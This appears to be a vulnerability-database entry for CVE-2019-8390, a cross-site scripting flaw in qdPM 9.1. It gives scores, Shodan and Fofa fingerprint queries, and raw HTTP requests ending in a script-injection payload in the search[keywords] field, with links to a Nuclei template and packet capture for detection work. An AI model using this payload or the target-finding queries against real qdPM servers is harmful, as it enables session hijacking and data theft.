🔙 목록으로 돌아가기

CVE-2019-8390: qdPM 9.1 - Cross-site Scripting

TitleqdPM 9.1 - Cross-site Scripting
Authortheamanrawat
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
RemediationUpgrade to a patched version of qdPM or apply the necessary security patches provided by the vendor.
CVSS Score6.1
EPSS Score0.02661
CVE IDCVE-2019-8390
CWE IDCWE-79
Shodan Queryhttp.favicon.hash:762074255
Fofa Queryicon_hash=762074255
Tags cve cve2019 xss qdpm authenticated edb vuln

🔍 Vulnerability Description

qdPM 9.1 suffers from Cross-site Scripting (XSS) in the search[keywords] parameter.

🌐 HTTP Request

GET /index.php/login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
Connection: close
Accept-Encoding: gzip
POST /index.php/login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15
Connection: close
Content-Length: 94
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

login%5B_csrf_token%5D=SPithO&login%5Bemail%5D=1HxA5o&login%5Bpassword%5D=sG6EQH&http_referer=
POST /index.php/users HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1
Connection: close
Content-Length: 85
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

search[keywords]=e"><script>alert(document.domain)</script>&search_by_extrafields[]=9

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-8390.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-8390.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A